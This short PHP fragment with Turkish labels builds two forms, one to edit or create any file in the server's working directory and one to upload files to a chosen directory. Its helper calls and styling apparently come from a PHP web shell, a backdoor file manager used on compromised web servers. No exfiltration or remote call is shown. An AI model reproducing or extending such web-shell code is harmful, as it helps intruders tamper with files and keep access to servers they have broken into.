$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dosya Duzenle weya Olustur:</FONT>' . $tb->makehidden('dir', getcwd()) . ' ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('Edit', 'Duzenle', '', 'submit')));
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '<FONT COLOR=#9C9C9C>Dosya Yukle:</FONT>' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', 'Ekle', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));
